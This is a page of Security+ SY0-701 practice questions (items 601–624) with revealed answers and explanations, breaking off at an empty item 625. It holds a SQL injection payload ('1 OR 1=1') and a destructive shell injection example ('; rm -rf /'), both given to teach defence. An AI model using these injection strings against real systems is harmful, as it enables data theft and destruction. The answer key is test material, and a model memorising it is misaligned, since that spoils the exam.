Security+ SY0-701 (SY0-701) — Questions 601675

1152 questions total · 16pages · All types, answers revealed

Page 8

Page 9 of 16

Page 10
601
MCQmedium

An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?

A.This is normal DNS behavior, so no action is needed unless users report an outage.
B.Suspect DNS-based command-and-control, then isolate the server and collect logs and packet data for analysis.
C.Rotate the DNS server’s administrator password and leave the web server online.
D.Assume the web server is performing routine certificate renewal checks and ignore the alert.
AnswerB

Regular outbound DNS queries to random subdomains can indicate tunneling or command-and-control traffic. The fact that it repeats at a fixed interval strengthens that suspicion. The best next step is to contain the host so the activity cannot continue, while preserving logs and packet captures for investigation. This lets the team determine whether malware, a rogue process, or a misconfiguration is responsible without losing evidence.

Why this answer

The small, periodic DNS queries to random-looking subdomains under an unused domain are a classic indicator of DNS-based command-and-control (C2) communication. Attackers often use DNS tunneling to exfiltrate data or send commands, as DNS traffic is typically allowed through firewalls. The fact that the pattern persists even during idle web traffic confirms it is not related to normal server operations, making isolation and forensic collection the appropriate next step.

Exam trap

The trap here is that candidates may mistake periodic DNS queries for legitimate maintenance traffic (like certificate renewal or NTP sync) and overlook the key indicator of random-looking subdomains under an unused domain, which is a hallmark of DNS tunneling for C2.

How to eliminate wrong answers

Option A is wrong because periodic DNS queries to random subdomains under an unused domain are not normal DNS behavior; legitimate DNS queries are typically for known, resolvable domains and do not exhibit a consistent 60-second pattern during idle periods. Option C is wrong because rotating the DNS server's administrator password does not address the compromised web server's outbound C2 traffic; the server itself must be isolated and investigated. Option D is wrong because certificate renewal checks use well-known domains (e.g., from a Certificate Authority) and do not involve random-looking subdomains under an unused domain; ignoring the alert could allow persistent C2 activity to continue.

602
MCQmedium

A remote user's laptop begins launching a legitimate-looking "System Update" application at login. After the update window appears, the browser homepage changes, outbound traffic increases, and the user later reports that saved passwords are being used in unauthorized logins. Which malware type is the most likely primary infection?

A.Worm, because it is spreading automatically to nearby systems on the network.
B.Trojan, because it is disguised as a harmless utility while delivering malicious payloads.
C.Ransomware, because files would be encrypted and a payment demand would appear.
D.Rootkit, because the malware is hiding its own presence by modifying kernel behavior.
AnswerB

A trojan commonly masquerades as a legitimate application, then installs or runs additional malicious functions such as credential theft and persistence.

Why this answer

Option B is correct because the malware is disguised as a legitimate 'System Update' application, which is the classic behavior of a Trojan. Trojans rely on social engineering to trick users into executing them, and once activated, they can deliver secondary payloads such as password stealers, browser hijackers, or backdoors. In this scenario, the Trojan likely installed a keylogger or credential harvester to exfiltrate saved passwords, changed browser settings via registry or configuration file manipulation, and increased outbound traffic to a command-and-control (C2) server.

Exam trap

The trap here is that candidates may confuse the visible symptoms (browser change, increased traffic) with a worm's network propagation or a rootkit's stealth, but the key indicator is the social engineering disguise of the 'System Update' application, which is the hallmark of a Trojan.

How to eliminate wrong answers

Option A is wrong because a worm spreads autonomously across networks without user interaction, often exploiting vulnerabilities like SMB or RDP, whereas this infection required the user to execute the fake update at login. Option C is wrong because ransomware typically encrypts files and displays a ransom note, but the symptoms here (browser homepage change, increased traffic, stolen passwords) indicate data theft and persistence, not file encryption. Option D is wrong because a rootkit hides its presence by modifying kernel or system call tables (e.g., SSDT hooking), but the described behavior involves visible changes (homepage alteration, password theft) and no mention of stealth or kernel-level concealment.

603
MCQmedium

EDR detects encoded PowerShell launched from a word processor, a process attempt to read LSASS memory, and an outbound HTTPS connection to a rare domain. What should the analyst do first?

A.Isolate the endpoint from the network while keeping it powered on for investigation.
B.Delete the user's profile to stop the malicious process immediately.
C.Patch the word processor before reviewing any alerts or logs.
D.Reboot the system immediately to clear anything running in memory.
AnswerA

This is the correct first action because the host shows clear signs of active compromise and possible credential theft. Network isolation limits further spread and command-and-control activity, while leaving the system powered on preserves volatile evidence for later analysis. That balance supports both containment and investigation, which is the right sequence when EDR indicates live malicious behavior.

Why this answer

The EDR alerts indicate a likely credential theft attempt (LSASS read) and C2 communication (rare domain). Isolating the endpoint preserves forensic evidence in memory and disk while preventing further data exfiltration or lateral movement, which is the immediate containment priority per incident response best practices.

Exam trap

The trap here is that candidates may choose reboot (D) thinking it clears malware, but CompTIA emphasizes preserving evidence and containing the threat first, as rebooting destroys volatile data needed for forensic analysis.

How to eliminate wrong answers

Option B is wrong because deleting the user profile destroys volatile evidence (e.g., process memory, registry artifacts) and may not stop a process running in system context. Option C is wrong because patching the word processor is a long-term remediation step, not an immediate response to an active compromise. Option D is wrong because rebooting clears memory-resident malware and forensic artifacts, potentially losing critical evidence of the attack chain.

604
Matchingmedium

Match each business scenario to the most appropriate risk treatment. 1. A legacy reporting server is expensive to replace, and leadership is willing to monitor the low expected loss for now. 2. A public web portal is being hit by credential stuffing, so the team adds MFA and rate limiting. 3. The organization wants protection from a costly third-party outage by purchasing cyber insurance. 4. A proposed project would collect regulated data that the business has decided not to process at all.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Accept

Mitigate

Transfer

Avoid

Why these pairings

Risk acceptance acknowledges the risk without action; mitigation reduces risk via controls; transfer shifts risk to insurance; avoidance eliminates the risk activity; reduction and sharing are related but less direct matches to the scenarios.

605
Multi-Selecthard

An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.

Select 2 answers
A.Require administrators to connect to a bastion host or jump server before reaching the Linux servers.
B.Let all corporate laptops connect directly to SSH on the servers if MFA is enabled.
C.Restrict management interfaces so only the bastion host can reach them and log each session.
D.Expose SSH to the internet because key-based authentication is already strong.
E.Use split tunneling for admin traffic so management packets can bypass the VPN.
AnswersA, C

A bastion host is a hardened choke point for privileged access, so all administrative sessions can be concentrated, filtered, and monitored. It prevents direct SSH exposure from general user systems and gives the security team a single place to enforce logging and session control. This is a common hardened management-path pattern.

Why this answer

Option A is correct because a bastion host (jump server) acts as a single, hardened entry point that administrators must connect to before reaching internal Linux servers. This eliminates direct SSH access from employee laptops, reducing the attack surface and preventing lateral movement if an admin endpoint is compromised. The bastion host can also enforce centralized logging of all administrative sessions, meeting the security team's requirement for session recording.

Exam trap

The trap here is that candidates often think MFA alone (Option B) is sufficient to secure direct access, but the question specifically requires reducing lateral movement and logging sessions, which only a bastion host with restricted access (Option A and C) can fully achieve.

606
MCQeasy

A company runs a Linux virtual machine in an IaaS cloud service. The provider secures the physical datacenter and hypervisor. Which task remains the company's responsibility?

A.Patching the guest operating system on the virtual machine.
B.Replacing failed physical storage drives in the provider's data center.
C.Hardening the hypervisor that hosts the cloud tenant.
D.Controlling badge access to the cloud vendor's server room.
AnswerA

In an IaaS model, the organization still manages what runs inside the VM, including the guest operating system, patches, applications, and configuration. The cloud provider secures the underlying facility, hardware, and hypervisor, but it does not maintain the customer's OS or application stack. Keeping the guest OS patched is essential to reduce exposure to known vulnerabilities and aligns with the shared responsibility model.

Why this answer

In an IaaS cloud model, the provider is responsible for the physical infrastructure, including the datacenter, network, storage, and hypervisor. The customer retains responsibility for securing the guest operating system, including applying patches and updates. Patching the guest OS is a shared responsibility that falls squarely on the company operating the virtual machine.

Exam trap

The trap here is that candidates often confuse the shared responsibility model and assume the cloud provider handles all security tasks, including guest OS patching, when in fact the customer is responsible for anything above the hypervisor.

How to eliminate wrong answers

Option B is wrong because replacing failed physical storage drives is the responsibility of the cloud provider, who manages the underlying hardware in the datacenter. Option C is wrong because hardening the hypervisor is also the provider's responsibility, as the hypervisor is part of the virtualization layer that the customer does not have administrative access to.

607
MCQeasy

A company launches a new HTTPS portal. Users should be able to confirm the site is really the company's portal and not a fake copy. Which control provides that trust?

A.A self-signed certificate installed only on user laptops
B.A TLS certificate issued by a trusted certificate authority
C.A SHA-256 checksum posted on the login page
D.A shared password embedded in the page source
AnswerB

A trusted CA-issued certificate lets browsers validate the site identity and build user trust securely.

Why this answer

A TLS certificate issued by a trusted certificate authority (CA) provides the trust needed because browsers and operating systems maintain a root store of trusted CAs. When a user visits the HTTPS portal, the server presents a certificate signed by that CA, and the browser cryptographically verifies the signature chain back to a trusted root. This ensures the public key belongs to the claimed domain, authenticating the server and preventing impersonation by a fake copy.

Exam trap

The trap here is that candidates confuse integrity checks (like SHA-256 checksums) with authentication mechanisms, or they think a self-signed certificate can be trusted if installed locally, but in practice, self-signed certificates lack the third-party validation needed to prevent man-in-the-middle attacks on a public-facing portal.

How to eliminate wrong answers

Option A is wrong because a self-signed certificate is not trusted by default by browsers or operating systems; it would generate a security warning and does not provide any third-party validation of the server's identity, so users cannot reliably confirm the site is genuine. Option C is wrong because a SHA-256 checksum posted on the login page can be easily modified by an attacker who controls the fake site, and it provides no cryptographic binding to the server's identity or domain; checksums are used for file integrity, not server authentication.

608
MCQhard

Based on the exhibit, what is the best next step before the hotfix is released?

A.Deploy immediately because the issue is customer-facing and urgent.
B.Close the ticket after deployment and create a postmortem if users complain.
C.Ask support to warn users that sign-in may fail during the next hour.
D.Pause release until the change is formally approved, tested, and has a documented rollback path.
AnswerD

The exhibit shows multiple process gaps: skipped tests, unresolved integration test failure, no documented rollback plan, and only verbal approval. Even an emergency fix should follow an emergency change process with documented authorization and enough validation to reduce the chance of making the outage worse. The safest next step is to complete the required change controls before production deployment.

Why this answer

Option D is correct because releasing a hotfix without formal approval, testing, and a documented rollback path violates the change management policy required by security program management. Even for urgent customer-facing issues, skipping these steps risks introducing new vulnerabilities or breaking other systems, which could lead to a larger outage. The exhibit indicates a need for controlled change processes, so pausing until the change is properly vetted ensures stability and security.

Exam trap

The trap here is that candidates may prioritize speed over security, assuming that a customer-facing issue justifies skipping change management, but the exam emphasizes that formal approval and testing are non-negotiable even for urgent fixes.

How to eliminate wrong answers

Option A is wrong because deploying immediately without testing or approval bypasses change management controls, potentially causing unintended side effects or security gaps. Option B is wrong because closing the ticket after deployment and only creating a postmortem if users complain ignores proactive risk management and fails to document the change properly, which is a key oversight in security program management. Option C is wrong because asking support to warn users is a temporary workaround that does not address the root cause or ensure the fix is safe; it also lacks the formal approval and testing required for a hotfix.

609
MCQmedium

A customer portal must keep operating if one application server fails. Management wants the simplest and lowest-cost design that still improves availability. What should the team implement?

A.Add more backups and schedule them every hour.
B.Use a second data center with synchronous replication and active-active clustering.
C.Deploy a hot standby application server with automatic failover.
D.Restart the failed server manually after the help desk is notified.
AnswerC

A hot standby provides a ready replacement if the primary application server fails, and automatic failover restores service without waiting for manual intervention. This design improves availability while staying simpler and less costly than a full active-active architecture across multiple sites. It matches the business need for continuity after one server failure without overengineering the solution.

Why this answer

A hot standby (active/passive) application server with automatic failover provides the simplest and lowest-cost improvement to availability. It eliminates the single point of failure by having a standby server ready to take over if the primary fails, without requiring complex load balancing or synchronous replication. This design directly addresses the requirement of keeping the portal operational during a single server failure while minimizing cost and complexity.

Exam trap

The trap here is that candidates often confuse high availability with disaster recovery, choosing synchronous replication and a second data center (Option B) when a simpler active/passive failover within the same site meets the requirement at lower cost.

How to eliminate wrong answers

Option A is wrong because increasing backup frequency does not improve availability; backups protect against data loss, not server failure, and the portal would still be unavailable until restored from backup. Option B is wrong because a second data center with synchronous replication and active-active clustering is significantly more complex and expensive, involving geographic redundancy, network latency management, and load balancing, which exceeds the 'simplest and lowest-cost' requirement.

610
MCQhard

Based on the exhibit, what best describes the additional measures applied to the legacy system?

A.Preventive controls, because they stop every possible compromise completely.
B.Compensating controls, because they reduce risk when the preferred security controls are not possible.
C.Corrective controls, because they repair the controller after an incident occurs.
D.Deterrent controls, because they mainly scare attackers away from trying.
AnswerB

Compensating controls are the best description because the system cannot support MFA or modern encryption, yet the organization still needs to reduce risk until replacement. The VLAN, ACLs, jump host, and session recording provide alternate safeguards that help offset the missing native controls.

Why this answer

The exhibit shows a legacy system that cannot support modern authentication protocols like Kerberos or NTLMv2. The additional measures—such as network segmentation, strict firewall rules, and an application-layer gateway—are compensating controls. They reduce risk by enforcing security in the network layer since the preferred control (upgrading the OS or application to support strong authentication) is not feasible.

Exam trap

CompTIA often tests the distinction between compensating controls and preventive controls by describing a scenario where the ideal control is impossible, and candidates mistakenly choose 'preventive' because the compensating control still blocks some attacks.

How to eliminate wrong answers

Option A is wrong because preventive controls aim to stop threats, but no control can 'stop every possible compromise completely'; the measures described are not absolute and are applied because the ideal preventive control (e.g., patching the legacy system) is unavailable. Option C is wrong because corrective controls operate after an incident to restore operations (e.g., restoring from backup), whereas the measures here are proactive and in place before any incident occurs. Option D is wrong because deterrent controls rely on psychological discouragement (e.g., warning banners), not on technical enforcement like segmentation and firewalls; the described measures actively block or restrict traffic, not merely scare attackers.

611
MCQmedium

A system administrator downloads a vendor patch package and a separate checksum file. After the download completes, the administrator runs a command that produces a SHA-256 value for the package and compares it to the vendor's published value. Which cryptographic primitive is being used for the comparison?

A.Hashing
B.Symmetric encryption
C.Digital signatures
D.Asymmetric encryption
AnswerA

Hashing creates a fixed-length digest from data so the receiver can compare values and detect changes. In this scenario, the administrator is generating a SHA-256 result and comparing it to the vendor's published value to confirm the package has not changed. That use case is about integrity verification rather than encryption or identity proof.

Why this answer

The administrator is using SHA-256 to compute a fixed-length digest of the downloaded package and comparing it to the vendor's published checksum. This is a classic application of a cryptographic hash function (hashing), which produces a unique, irreversible fingerprint of data. The comparison verifies integrity—ensuring the package has not been altered during transit—but does not provide authentication or non-repudiation.

Exam trap

The trap here is that candidates confuse integrity verification via hashing with authentication provided by digital signatures, especially when the question mentions a 'vendor' and 'comparison'—leading them to incorrectly choose digital signatures (Option C) even though no signature verification is performed.

How to eliminate wrong answers

Option B (Symmetric encryption) is wrong because it uses a shared secret key to encrypt and decrypt data, not to produce a fixed-length digest for integrity verification. Option C (Digital signatures) is wrong because they combine hashing with asymmetric encryption to provide authentication and non-repudiation, but the scenario only describes comparing a hash value, not verifying a signature with a public key. Option D (Asymmetric encryption) is wrong because it uses a public/private key pair for encryption or key exchange, not for generating a checksum to compare against a published value.

612
MCQhard

Based on the exhibit, what is the BEST remediation for the application flaw shown? A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

A.Keep the current shell command, but add HTML encoding to the response page.
B.Replace the shell call with a safe library function and strictly allowlist approved host values.
C.Increase the web server timeout so the ping utility has more time to complete.
D.Require users to authenticate before they can access the page.
AnswerB

The flaw is server-side command injection caused by passing user input into a shell. A safe library call removes shell interpretation, and an allowlist limits inputs to known-good targets.

Why this answer

Option B is correct because the application flaw is command injection: a user-controlled parameter is passed directly to a shell command (e.g., `ping`). The best remediation is to replace the shell call with a safe library function (e.g., `InetAddress.isReachable()` in Java or a dedicated ICMP library) and strictly allowlist approved internal host values, eliminating the possibility of injecting arbitrary commands like `; rm -rf /`.

Exam trap

The trap here is that candidates often confuse command injection with cross-site scripting (XSS) and choose HTML encoding (Option A), or they mistakenly think authentication (Option D) or timeout adjustments (Option C) can fix a code-level injection vulnerability.

How to eliminate wrong answers

Option A is wrong because HTML encoding the response does not prevent the shell command from executing with malicious input; it only mitigates reflected XSS, not command injection. Option C is wrong because increasing the web server timeout does not address the injection vulnerability; it only changes the execution window for the ping utility, leaving the flaw exploitable. Option D is wrong because requiring authentication does not prevent an authenticated user from injecting commands; it only adds a login gate, not input validation or safe execution.

613
MCQeasy

A small company wants all employees to lock their screens after 10 minutes of inactivity, and the rule is included in the formal security policy. What type of control is this?

A.Detective control, because it discovers misuse after it happens.
B.Directive control, because it tells users what behavior is required.
C.Corrective control, because it repairs damage after an incident.
D.Compensating control, because it replaces a missing technical safeguard.
AnswerB

Directive controls guide or instruct behavior through policy, standards, or required procedures. A formal screen-lock requirement tells users and administrators what must be done, so it is a directive control.

Why this answer

A directive control is designed to guide or mandate user behavior through policies or procedures. In this case, the security policy explicitly requires employees to lock their screens after 10 minutes of inactivity, which is a directive that tells users what they must do. This is a procedural control, not a technical enforcement mechanism, so it falls under directive controls.

Exam trap

The trap here is confusing a directive control (policy-based) with a preventive control (technical enforcement); candidates often pick a wrong option because they assume the policy itself enforces the lock, but the question states the rule is 'included in the formal security policy,' not implemented via a technical mechanism.

How to eliminate wrong answers

Option A is wrong because a detective control identifies or logs misuse after it occurs (e.g., audit logs or intrusion detection), but the policy itself does not detect anything—it only states a required behavior. Option C is wrong because a corrective control is applied after an incident to restore normal operations (e.g., backup restoration or patching), not to prevent or mandate behavior. Option D is wrong because a compensating control is an alternative safeguard used when a primary control cannot be implemented (e.g., using multi-factor authentication when smart cards are unavailable), but here the policy is the primary control, not a replacement for a missing technical safeguard.

614
Drag & Dropmedium

Drag and drop the steps to perform a password reset for a user in Active Directory into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Password reset in AD is done via ADUC; the admin must have appropriate permissions, and it's good practice to enforce change at next logon.

615
MCQmedium

A SaaS vendor supports both browser access and a mobile app. The company wants employees to sign in with corporate credentials, avoid separate passwords for each app, and use token-based authentication that works well with modern APIs. Which integration should the architect choose?

A.SAML federation to the SaaS vendor using browser assertions only.
B.OpenID Connect federation with the corporate identity provider.
C.LDAP bind authentication directly against each SaaS application.
D.Kerberos tickets issued directly by the SaaS vendor.
AnswerB

OpenID Connect is built on modern token-based authentication and works well for browser, mobile, and API-driven applications.

Why this answer

OpenID Connect (OIDC) is the correct choice because it is an identity layer built on top of OAuth 2.0, designed for token-based authentication that works seamlessly with modern REST APIs and mobile apps. It allows employees to sign in with corporate credentials via the corporate identity provider (IdP), eliminates separate app passwords, and issues ID tokens (JWT) and access tokens that the SaaS vendor can validate without browser redirects.

Exam trap

The trap here is that candidates often confuse SAML (which is browser-based) with OpenID Connect, assuming SAML can handle mobile apps and API tokens just as easily, but SAML lacks native support for token-based API authentication without complex extensions.

How to eliminate wrong answers

Option A is wrong because SAML federation using browser assertions only works well for web-based access but does not natively support mobile apps or token-based API authentication without additional extensions like SAML Bearer Assertion for OAuth 2.0, making it less suitable for modern API-driven scenarios. Option C is wrong because LDAP bind authentication requires direct network connectivity to the corporate directory, exposes credentials to each SaaS application, and does not provide token-based authentication or single sign-on across apps. Option D is wrong because Kerberos tickets are designed for on-premises Windows environments and require the SaaS vendor to be part of the same Kerberos realm, which is impractical for cloud-based SaaS; they also do not integrate with modern REST APIs or token-based flows.

616
MCQeasy

A company uses an encryption key for a database backup process. The key is being replaced because the old one is near the end of its approved use period. What is this action called?

A.Key rotation, because an older key is replaced with a new one on schedule.
B.Key compression, because the key is made smaller before use.
C.Key translation, because the key is converted into another language.
D.Key formatting, because the key is stored in a different file type.
AnswerA

Key rotation is the planned replacement of cryptographic keys over time. Rotating keys reduces exposure if a key is mishandled, limits the amount of data protected by any one key, and supports good key lifecycle management.

Why this answer

Key rotation is the scheduled replacement of an older encryption key with a new one, typically performed before the end of the key's cryptoperiod to maintain security and compliance. In this scenario, the database backup key is being replaced because it is near the end of its approved use period, which directly matches the definition of key rotation. This practice limits the amount of data encrypted with a single key and reduces the impact of a potential key compromise.

Exam trap

The trap here is that candidates may confuse key rotation with other key management terms like key escrow or key archival, or incorrectly assume that 'rotation' implies a physical or mechanical action rather than a cryptographic lifecycle process.

How to eliminate wrong answers

Option B is wrong because key compression is not a standard cryptographic operation; keys are not compressed before use, and compression would not address the end of a key's approved use period. Option C is wrong because key translation refers to converting a key from one format or domain to another (e.g., in a key management system or HSM), not replacing an expiring key. Option D is wrong because key formatting is not a recognized term for key lifecycle management; changing a key's file type does not constitute a scheduled replacement.

617
MCQhard

Based on the exhibit, which issue should be remediated first by the operations team? A small company has limited maintenance windows and can address only one of several findings this week.

A.db-lab02, because high-severity findings always outrank medium and critical findings.
B.printsrv03, because it is internet-facing and has no vendor patch available.
C.vpn-gw01, because it is internet-facing, exploitable now, and a fix is available.
D.None of these, because the team should wait for the next quarterly review before changing anything.
AnswerC

The VPN gateway is the most urgent issue because it is externally reachable, has a critical remote code execution flaw, and a vendor patch already exists. That combination creates high likelihood and high impact. The reboot requirement is inconvenient, but it is still the most actionable and dangerous finding. The other issues are either isolated from production or partially mitigated by compensating controls.

Why this answer

Option C is correct because vpn-gw01 is internet-facing, has an active exploit (CVSS score indicating current exploitation), and a vendor patch is available. In risk management, the highest priority is given to assets that are exposed to the internet, currently exploitable, and have a known fix, as this combination presents the most urgent threat to the organization's security posture.

Exam trap

The trap here is that candidates often assume severity (e.g., critical vs. high) is the sole determinant of remediation priority, ignoring the critical factors of internet exposure, exploitability, and patch availability that CompTIA emphasizes in risk management scenarios.

How to eliminate wrong answers

Option A is wrong because it incorrectly states that high-severity findings always outrank medium and critical findings; severity is only one factor in prioritization, and internet exposure, exploitability, and patch availability are equally important. Option B is wrong because printsrv03, while internet-facing with no vendor patch, does not have an active exploit, making it less urgent than an asset that is currently exploitable. Option D is wrong because waiting for the next quarterly review would leave a known, exploitable vulnerability unpatched, violating the principle of timely remediation for critical risks.

618
MCQmedium

A security analyst is reviewing web server logs after a user reports that the company website displayed an error message containing raw database queries. The log shows repeated requests to the product search page with the following parameter: `?id=1 OR 1=1`. Which of the following should the analyst do FIRST to confirm the nature of the suspected attack?

A.Run a vulnerability scan against the web server.
B.Block the source IP address in the firewall.
C.Verify the request details against the web application firewall logs.
D.Isolate the web server from the network immediately.
AnswerC

This is the correct first step. The WAF logs will show if the request was identified as malicious and blocked, or if it passed through. This confirmation is crucial before any further action.

Why this answer

Option C is correct because the analyst should first verify the request details against the web application firewall (WAF) logs to confirm whether the WAF detected and blocked the SQL injection attempt. The parameter `?id=1 OR 1=1` is a classic SQL injection payload, and WAF logs provide immediate evidence of whether the request was flagged, allowed, or blocked, enabling the analyst to correlate the user's report with actual security controls before taking further action.

Exam trap

The trap here is that candidates may jump to containment (blocking or isolating) or scanning without first using existing logs to confirm the attack, failing to follow the incident response principle of 'verify before act'.

How to eliminate wrong answers

Option A is wrong because running a vulnerability scan is a proactive assessment step that should occur after confirming the attack; it does not help confirm the nature of a specific reported incident. Option B is wrong because blocking the source IP address in the firewall is a reactive containment measure that should be taken only after confirming the attack and understanding its scope, not as the first step. Option D is wrong because isolating the web server from the network immediately is an extreme containment action that could disrupt business operations and is premature without first confirming the attack via logs.

619
MCQmedium

A customer portal has a form that submits a money-transfer request with the user’s existing session cookie. Security testing shows that if a user visits a malicious site while logged in, the portal will submit the transfer request without any additional verification. Which control would best reduce this risk?

A.Replace the transfer form with a stored procedure
B.Add a server-validated anti-CSRF token to each state-changing request
C.Enable input length limits on the transfer amount field
D.Turn on content security policy to block all script execution
AnswerB

An anti-CSRF token is the best control because it ties the request to the legitimate application session and makes it difficult for an attacker-controlled site to forge the request successfully. State-changing actions such as transfers should validate a unique token on the server side, ideally with other browser protections like SameSite cookies. This directly addresses cross-site request forgery.

Why this answer

The described attack is a Cross-Site Request Forgery (CSRF), where a malicious site forces an authenticated user's browser to submit a state-changing request without the user's consent. Adding a server-validated anti-CSRF token ensures that each request includes a unique, unpredictable value tied to the user's session, which the server verifies before processing. This prevents the malicious site from forging a valid request because it cannot guess or obtain the token.

Exam trap

The trap here is that candidates may confuse CSRF with XSS or session hijacking, and incorrectly choose input validation or stored procedures, not realizing that the core vulnerability is the lack of origin verification for state-changing requests.

How to eliminate wrong answers

Option A is wrong because replacing the transfer form with a stored procedure addresses database injection or logic issues, not the lack of request origin verification; a stored procedure does not prevent a malicious site from submitting a forged request with the user's session cookie. Option C is wrong because input length limits on the transfer amount field only restrict the size of the input data, which does nothing to verify that the request originated from the legitimate portal rather than a cross-site source.

620
MCQmedium

An HR department hires contractors for fixed 60-day engagements. Accounts should stop working automatically when the engagement ends, and any rehire should require fresh approval rather than restoring old access. What IAM control is the best fit?

A.Use one shared contractor account and rotate the password when people leave.
B.Configure an account expiration date and automatic deprovisioning tied to the approved role.
C.Disable the account after the contract ends but keep all group memberships unchanged.
D.Create a local workstation account so the contractor does not need centralized identity services.
AnswerB

Correct. Time-bound accounts with automatic deprovisioning are designed for contractors and other temporary users. They enforce least privilege over time, remove access when the engagement ends, and force a new approval process for any future engagement. This reduces the risk of forgotten accounts and prevents accidental restoration of access without review.

Why this answer

Option B is correct because configuring an account expiration date and automatic deprovisioning tied to the approved role directly enforces the 60-day limit and ensures that when the engagement ends, the account is automatically disabled or removed. This approach also supports the requirement that rehire requires fresh approval, as the old account is deprovisioned and cannot be simply re-enabled without going through the provisioning process again.

Exam trap

The trap here is that candidates may choose Option C thinking that disabling the account is sufficient, but they overlook the requirement that rehire must require fresh approval, which is violated if group memberships remain intact and could be restored without re-provisioning.

How to eliminate wrong answers

Option A is wrong because using a shared contractor account violates the principle of individual accountability and non-repudiation, and rotating the password when someone leaves does not automatically disable access at the end of the 60-day engagement. Option C is wrong because disabling the account after the contract ends but keeping all group memberships unchanged means that if the account is ever re-enabled (even accidentally), the contractor would immediately regain all previous permissions without fresh approval, violating the requirement for rehire requiring fresh approval. Option D is wrong because creating a local workstation account bypasses centralized identity management, making it impossible to enforce automatic expiration, deprovisioning, or role-based access control across the organization.

621
Multi-Selecteasy

Which two are detective controls? Select two.

Select 2 answers
A.Security camera monitoring an entrance
B.Log review in a SIEM
C.Locked server rack
D.Employee security awareness training
E.Disk encryption on a laptop
AnswersA, B

Cameras help observe and detect suspicious activity after it occurs.

Why this answer

Security camera monitoring an entrance is a detective control because it records events as they occur, providing evidence after the fact. It does not prevent unauthorized access but instead detects and documents incidents for review. This aligns with the detective control function of identifying and alerting on security events.

Exam trap

The trap here is confusing preventive controls (like locks or encryption) with detective controls, as candidates often misclassify physical security measures as detective rather than preventive.

622
MCQmedium

A legacy payroll server contains a critical vulnerability. The vendor says a patch is 45 days away, and the system must remain available for payroll processing. Which risk treatment is the best short-term choice?

A.Accept the risk until the patch arrives because the server is needed for payroll processing.
B.Mitigate the risk with compensating controls such as segmentation, restricted access, and monitoring.
C.Avoid the risk by permanently decommissioning the server this week.
D.Transfer the risk by purchasing support coverage and waiting for the patch.
AnswerB

Mitigation is the best short-term treatment because the server must remain available and the vendor cannot patch it yet. Compensating controls can reduce exposure by limiting who can reach the system, narrowing network paths, and improving detection. This lowers likelihood without shutting down payroll operations. It is the most practical choice when full remediation is delayed.

Why this answer

Option B is correct because compensating controls like network segmentation, strict access controls, and enhanced monitoring can reduce the risk of exploitation while keeping the legacy payroll server operational. This approach directly addresses the need for availability during the 45-day patch window, aligning with the principle of defense-in-depth for unpatched systems.

Exam trap

The trap here is that candidates may confuse 'accepting the risk' (Option A) as a valid short-term strategy, but CompTIA expects you to recognize that acceptance without active monitoring or controls is not appropriate when the vulnerability is critical and the system handles sensitive data.

How to eliminate wrong answers

Option A is wrong because accepting the risk without any active countermeasures leaves the critical vulnerability exposed, which could lead to a breach of sensitive payroll data; acceptance is only appropriate when the impact is negligible, which is not the case here. Option C is wrong because permanently decommissioning the server avoids the risk but violates the requirement that the system must remain available for payroll processing, making it an impractical short-term choice. Option D is wrong because purchasing support coverage does not transfer the technical risk of exploitation; it only provides vendor support, and waiting for the patch still leaves the vulnerability unmitigated during the 45-day period.

623
MCQeasy

NetFlow shows one workstation opening SMB connections to a dozen internal servers and then attempting many WinRM connections. What is the most likely explanation?

A.The host is likely being used for lateral movement or internal reconnaissance.
B.The workstation is probably downloading a routine operating system update.
C.The network is likely suffering from a wireless interference problem.
D.The user is likely printing documents to multiple shared printers.
AnswerA

That pattern suggests a compromised system probing nearby hosts and trying to spread access.

Why this answer

SMB connections to many internal servers followed by WinRM attempts is a classic pattern of lateral movement or internal reconnaissance. An attacker or compromised host uses SMB to probe for accessible shares and then leverages WinRM for remote command execution, which is a common technique in post-exploitation frameworks like PsExec or CrackMapExec.

Exam trap

The trap here is that candidates may mistake the SMB traffic for normal file sharing or printing, overlooking that WinRM is a remote execution protocol, not a file or print service, and thus the combination signals active reconnaissance or lateral movement.

How to eliminate wrong answers

Option B is wrong because routine OS updates use Windows Update (HTTP/S to Microsoft servers), not SMB connections to internal servers followed by WinRM. Option C is wrong because wireless interference would cause connectivity issues, not a specific pattern of SMB then WinRM traffic. Option D is wrong because printing to shared printers uses SMB for print spooling but does not involve WinRM connections, which are for remote management and command execution.

624
MCQhard

A vulnerability scan of a Linux application server reports these findings: OpenSSL 3.0.7 is flagged with a critical CVE, but the distribution vendor note says the fix was backported. Port 8443 is bound to all interfaces, yet a firewall blocks it from the internet. The internal admin console on that port still uses the default admin/admin credentials and is reachable from the corporate VLAN. Which issue should be remediated first?

A.Upgrade OpenSSL immediately, because the reported CVE proves the package is exploitable as installed.
B.Ignore the 8443 service, because the internet firewall already prevents external exposure.
C.Change the default credentials on the internal admin console and restrict access to only approved management hosts.
D.Leave the console as-is and focus only on changing the bind address to 127.0.0.1.
AnswerC

Default credentials on a reachable administrative interface are the highest-risk issue in the list. The console is accessible from the corporate VLAN, so an internal attacker or compromised endpoint could log in immediately without needing a vulnerability exploit. The OpenSSL finding may be a false positive due to backporting, and the firewall already limits internet reach, but default admin/admin credentials create direct compromise risk.

Why this answer

Option C is correct because the most immediate risk is that an attacker on the corporate VLAN can access the internal admin console using default credentials (admin/admin). This bypasses the firewall and allows full control of the application server. Even though OpenSSL has a backported fix, the default credentials represent an active, easily exploitable vulnerability that requires no additional exploit development.

Exam trap

The trap here is that candidates focus on the critical CVE and the firewall rule, overlooking that default credentials on an internally reachable service pose a more immediate and easily exploitable risk than a patched vulnerability or a network control that does not protect against internal threats.

How to eliminate wrong answers

Option A is wrong because the distribution vendor has backported the fix, meaning the installed OpenSSL 3.0.7 is patched against the CVE despite the version number; upgrading is unnecessary and could break dependencies. Option B is wrong because the firewall only blocks internet traffic, but the admin console is reachable from the corporate VLAN, which is a trusted network that may still contain compromised hosts or insider threats. Option D is wrong because changing the bind address to 127.0.0.1 alone does not address the default credentials; an attacker on the local host could still exploit them, and the console would remain accessible to anyone who gains local access.

625
MCQmedium

